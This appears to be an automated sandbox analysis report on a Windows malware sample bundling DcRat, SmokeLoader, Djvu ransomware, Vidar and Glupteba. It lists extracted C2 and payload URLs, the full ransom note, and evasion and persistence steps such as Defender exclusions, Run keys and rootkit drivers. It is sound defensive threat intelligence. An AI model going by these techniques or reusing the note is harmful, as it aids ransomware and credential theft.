dcrat | 1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922

Resubmissions

08-02-2024 19:00

240208-xnla2ahe7z 10

08-02-2024 07:34

240208-jd5p2aefen 10

08-02-2024 04:47

240208-fevdxabb9y 10

Analysis

max time kernel
299s
max time network
304s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
08-02-2024 04:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe
Size

5.5MB
MD5

c4580e8db0c3dbc88891842fd8a31158
SHA1

744f03fcf10db1459d3f40beaea2bfe1b000582b
SHA256

1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922
SHA512

cefd412e0d5aba56d6603fdc46a056474ce387dbb220b32a9317dca0822bef9320515afacc2ab2086db46f9e01b3456c87a0dc83bd99c246550d87efd3606945
SSDEEP

98304:Fs9EI6sZJrf04Hr3VvPkrcRizJ6krK4JLQaEHlXU+vG9G1jMaZQRrkp:W+I6sU4HjZkwkVJo1+G1jMaZQpk

Malware Config

Extracted

Family

smokeloader

Botnet

pub1

Extracted

Family

smokeloader

Version

2022

http://trad-einmyus.com/index.php

http://tradein-myus.com/index.php

http://trade-inmyus.com/index.php

rc4.i32

Extracted

Family

djvu

http://habrafa.com/test1/get.php

Attributes

extension
.ldhy
offline_id
pIGzEr0bxHiTz7xnvNidWeqzKkxMfVdHTyCkzwt1
payload_url
http://brusuax.com/dl/build2.exe

http://habrafa.com/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. Do not ask assistants from youtube and recovery data sites for help in recovering your data. They can use your free decryption quota and scam you. Our contact is emails in this text document only. You can get and look video overview decrypt tool: https://we.tl/t-hPAqznkJKD Price of private key and decrypt software is $999. Discount 50% available if you contact us first 72 hours, that's price for you is $499. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0849ASdw

rsa_pubkey.plain

Extracted

Family

vidar

Version

7.7

Botnet

655507914130aa0fe72362726c206a7c

https://t.me/newagev

https://steamcommunity.com/profiles/76561199631487327

Attributes

profile_id_v2
655507914130aa0fe72362726c206a7c

Signatures

DcRat 7 IoCs

DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

rat infostealer dcrat

Processes:

schtasks.exed21cbe21e38b385a41a68c5e6dd32f4c.exeschtasks.exeschtasks.exeschtasks.exetoolspub1.exeschtasks.exe

pid	process
1760	schtasks.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1603059206-2004189698-4139800220-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	d21cbe21e38b385a41a68c5e6dd32f4c.exe
1340	schtasks.exe
2756	schtasks.exe
2692	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
1032	schtasks.exe

Detect Fabookie payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2244-214-0x0000000003560000-0x000000000368C000-memory.dmp	family_fabookie
behavioral1/memory/2244-240-0x0000000003560000-0x000000000368C000-memory.dmp	family_fabookie

Detect Vidar Stealer 4 IoCs

stealer

Processes:

resource	yara_rule
behavioral1/memory/1740-517-0x00000000001C0000-0x00000000001F1000-memory.dmp	family_vidar_v7
behavioral1/memory/2124-523-0x0000000000400000-0x0000000000644000-memory.dmp	family_vidar_v7
behavioral1/memory/2124-586-0x0000000000400000-0x0000000000644000-memory.dmp	family_vidar_v7
behavioral1/memory/2860-706-0x0000000000920000-0x0000000000A20000-memory.dmp	family_vidar_v7

Detected Djvu ransomware 14 IoCs

Processes:

resource	yara_rule
behavioral1/memory/880-405-0x0000000001E50000-0x0000000001F6B000-memory.dmp	family_djvu
behavioral1/memory/912-404-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/912-409-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/912-410-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/912-433-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/2804-448-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/2804-450-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/2804-476-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/2804-477-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/2804-490-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/2804-492-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/2804-493-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/2804-502-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/2860-706-0x0000000000920000-0x0000000000A20000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 10 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2820-39-0x0000000002B00000-0x00000000033EB000-memory.dmp	family_glupteba
behavioral1/memory/2820-41-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2820-167-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2340-198-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2340-236-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2088-246-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2088-373-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2088-408-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2088-438-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2088-501-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

Windows security bypass 2 TTPs 7 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

d21cbe21e38b385a41a68c5e6dd32f4c.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\d21cbe21e38b385a41a68c5e6dd32f4c.exe = "0"	d21cbe21e38b385a41a68c5e6dd32f4c.exe

Modifies boot configuration data using bcdedit 14 IoCs

Processes:

bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exe

pid	process
2504	bcdedit.exe
2112	bcdedit.exe
2440	bcdedit.exe
1208	bcdedit.exe
2376	bcdedit.exe
2308	bcdedit.exe
1316	bcdedit.exe
2924	bcdedit.exe
1784	bcdedit.exe
2648	bcdedit.exe
2364	bcdedit.exe
1504	bcdedit.exe
292	bcdedit.exe
2556	bcdedit.exe

Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

csrss.exe

description ioc process

File created C:\Windows\system32\drivers\Winmon.sys csrss.exe
Modifies Windows Firewall 2 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exe

pid process

2064 netsh.exe
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
evasion

Impair Defenses
T1562

Command and Scripting Interpreter
T1059

description	ioc	process
File created	C:\Windows\system32\drivers\Winmon.sys	csrss.exe

pid	process
2064	netsh.exe

Executes dropped EXE 35 IoCs

Processes:

InstallSetup_nine.exed21cbe21e38b385a41a68c5e6dd32f4c.exerty25.exetoolspub1.exeu21k.0.exed21cbe21e38b385a41a68c5e6dd32f4c.exeu21k.1.execsrss.exepatch.exeinjector.exeC40A.exeDD84.exeDD84.exeDD84.exeDD84.exedsefix.exebuild2.exebuild2.exewindefender.exewindefender.exe6AD6.exebuild3.exebuild3.execjcwfvsmstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exedcb505dc2b9d8aac05f4ca0727f5eadb.exe713674d5e968cbe2102394be0b2bae6f.exe1bf850b4d9587c1017a75a47680584c4.exewup.execsrss.exe

pid	process
2648	InstallSetup_nine.exe
2820	d21cbe21e38b385a41a68c5e6dd32f4c.exe
2244	rty25.exe
2716	toolspub1.exe
548	u21k.0.exe
2340	d21cbe21e38b385a41a68c5e6dd32f4c.exe
3068	u21k.1.exe
2088	csrss.exe
308	patch.exe
1992	injector.exe
2564	C40A.exe
880	DD84.exe
912	DD84.exe
2368	DD84.exe
2804	DD84.exe
2444	dsefix.exe
1740	build2.exe
2124	build2.exe
576	windefender.exe
1632	windefender.exe
2504	6AD6.exe
1720	build3.exe
320	build3.exe
1060	cjcwfvs
2860	mstsca.exe
1996	mstsca.exe
2328	mstsca.exe
2212	mstsca.exe
2584	mstsca.exe
2768	mstsca.exe
2432	dcb505dc2b9d8aac05f4ca0727f5eadb.exe
588	713674d5e968cbe2102394be0b2bae6f.exe
1784	1bf850b4d9587c1017a75a47680584c4.exe
2904	wup.exe
1944	csrss.exe

Loads dropped DLL 58 IoCs

Processes:

1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exeInstallSetup_nine.exed21cbe21e38b385a41a68c5e6dd32f4c.exeu21k.0.exepatch.execsrss.exeDD84.exeDD84.exeDD84.exeDD84.exeWerFault.exeWerFault.exedcb505dc2b9d8aac05f4ca0727f5eadb.exe

pid	process
2008	1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe
2008	1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe
2008	1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe
2008	1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe
2008	1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe
2008	1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe
2648	InstallSetup_nine.exe
2648	InstallSetup_nine.exe
2648	InstallSetup_nine.exe
2648	InstallSetup_nine.exe
2648	InstallSetup_nine.exe
2648	InstallSetup_nine.exe
2648	InstallSetup_nine.exe
2648	InstallSetup_nine.exe
2648	InstallSetup_nine.exe
2340	d21cbe21e38b385a41a68c5e6dd32f4c.exe
2340	d21cbe21e38b385a41a68c5e6dd32f4c.exe
548	u21k.0.exe
548	u21k.0.exe
856
308	patch.exe
308	patch.exe
2088	csrss.exe
308	patch.exe
308	patch.exe
308	patch.exe
880	DD84.exe
912	DD84.exe
912	DD84.exe
2368	DD84.exe
308	patch.exe
308	patch.exe
308	patch.exe
2088	csrss.exe
2804	DD84.exe
2804	DD84.exe
2456	WerFault.exe
2456	WerFault.exe
2456	WerFault.exe
2456	WerFault.exe
2456	WerFault.exe
2456	WerFault.exe
2456	WerFault.exe
3056	WerFault.exe
3056	WerFault.exe
3056	WerFault.exe
3056	WerFault.exe
3056	WerFault.exe
2804	DD84.exe
2804	DD84.exe
2088	csrss.exe
2088	csrss.exe
2088	csrss.exe
2088	csrss.exe
2088	csrss.exe
2088	csrss.exe
2432	dcb505dc2b9d8aac05f4ca0727f5eadb.exe
2432	dcb505dc2b9d8aac05f4ca0727f5eadb.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

2560 icacls.exe
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
2560	icacls.exe

UPX packed file 11 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/576-576-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/1632-577-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/576-579-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/1632-626-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe	upx
behavioral1/memory/2088-827-0x000000002D440000-0x000000002D921000-memory.dmp	upx
behavioral1/memory/2432-829-0x0000000000400000-0x00000000008E1000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe	upx
behavioral1/memory/588-836-0x0000000000050000-0x000000000091D000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe	upx
behavioral1/memory/2088-843-0x000000002D540000-0x000000002DA28000-memory.dmp	upx

Windows security modification 2 TTPs 7 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

d21cbe21e38b385a41a68c5e6dd32f4c.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\d21cbe21e38b385a41a68c5e6dd32f4c.exe = "0"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	d21cbe21e38b385a41a68c5e6dd32f4c.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

DD84.execsrss.exed21cbe21e38b385a41a68c5e6dd32f4c.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1603059206-2004189698-4139800220-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\8e8d35eb-7d56-44b8-acfa-1c01011057ad\\DD84.exe\" --AutoStart"	DD84.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1603059206-2004189698-4139800220-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1603059206-2004189698-4139800220-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	d21cbe21e38b385a41a68c5e6dd32f4c.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

71 api.2ip.ua
72 api.2ip.ua
80 api.2ip.ua
Manipulates WinMon driver. 2 IoCs
Roottkits write to WinMon to hide PIDs from being detected.
rootkit evasion

Processes:

csrss.execsrss.exe

description ioc process

File opened for modification \??\WinMon csrss.exe
File opened for modification \??\WinMon csrss.exe
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
rootkit evasion

Processes:

csrss.exe

description ioc process

File opened for modification \??\WinMonFS csrss.exe

flow	ioc
71	api.2ip.ua
72	api.2ip.ua
80	api.2ip.ua

description	ioc	process
File opened for modification	\??\WinMon	csrss.exe
File opened for modification	\??\WinMon	csrss.exe

description	ioc	process
File opened for modification	\??\WinMonFS	csrss.exe

Suspicious use of SetThreadContext 7 IoCs

Processes:

DD84.exeDD84.exebuild2.exebuild3.exemstsca.exemstsca.exemstsca.exe

description	pid	process	target process
PID 880 set thread context of 912	880	DD84.exe	DD84.exe
PID 2368 set thread context of 2804	2368	DD84.exe	DD84.exe
PID 1740 set thread context of 2124	1740	build2.exe	build2.exe
PID 1720 set thread context of 320	1720	build3.exe	build3.exe
PID 2860 set thread context of 1996	2860	mstsca.exe	mstsca.exe
PID 2328 set thread context of 2212	2328	mstsca.exe	mstsca.exe
PID 2584 set thread context of 2768	2584	mstsca.exe	mstsca.exe

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery
T1082

Processes:

d21cbe21e38b385a41a68c5e6dd32f4c.exe

description ioc process

File opened (read-only) \??\VBoxMiniRdrDN d21cbe21e38b385a41a68c5e6dd32f4c.exe

description	ioc	process
File opened (read-only)	\??\VBoxMiniRdrDN	d21cbe21e38b385a41a68c5e6dd32f4c.exe

Drops file in Windows directory 5 IoCs

Processes:

d21cbe21e38b385a41a68c5e6dd32f4c.exemakecab.execsrss.exe

description	ioc	process
File opened for modification	C:\Windows\rss	d21cbe21e38b385a41a68c5e6dd32f4c.exe
File created	C:\Windows\rss\csrss.exe	d21cbe21e38b385a41a68c5e6dd32f4c.exe
File created	C:\Windows\Logs\CBS\CbsPersist_20240208044749.cab	makecab.exe
File created	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe

Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exe

pid process

1684 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

2456 2124 WerFault.exe build2.exe
3056 2504 WerFault.exe 6AD6.exe

pid	process
1684	sc.exe

pid	pid_target	process	target process
2456	2124	WerFault.exe	build2.exe
3056	2504	WerFault.exe	6AD6.exe

Checks SCSI registry key(s) 3 TTPs 9 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

C40A.execjcwfvstoolspub1.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	C40A.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	C40A.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cjcwfvs
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cjcwfvs
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cjcwfvs
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	C40A.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

u21k.0.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	u21k.0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	u21k.0.exe

Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

2692 schtasks.exe
1032 schtasks.exe
1760 schtasks.exe
1340 schtasks.exe
2756 schtasks.exe
GoLang User-Agent 3 IoCs
Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description flow ioc

HTTP User-Agent header 149 Go-http-client/1.1
HTTP User-Agent header 217 Go-http-client/1.1
HTTP User-Agent header 243 Go-http-client/1.1

pid	process
2692	schtasks.exe
1032	schtasks.exe
1760	schtasks.exe
1340	schtasks.exe
2756	schtasks.exe

description	flow	ioc
HTTP User-Agent header	149	Go-http-client/1.1
HTTP User-Agent header	217	Go-http-client/1.1
HTTP User-Agent header	243	Go-http-client/1.1

Modifies data under HKEY_USERS 64 IoCs

Processes:

d21cbe21e38b385a41a68c5e6dd32f4c.exewindefender.exenetsh.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-82 = "Atlantic Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-671 = "AUS Eastern Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-448 = "Azerbaijan Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-11 = "Azores Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-434 = "Georgian Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-541 = "Myanmar Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-81 = "Atlantic Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-362 = "GTB Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Key created	\REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-222 = "Alaskan Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0"	netsh.exe
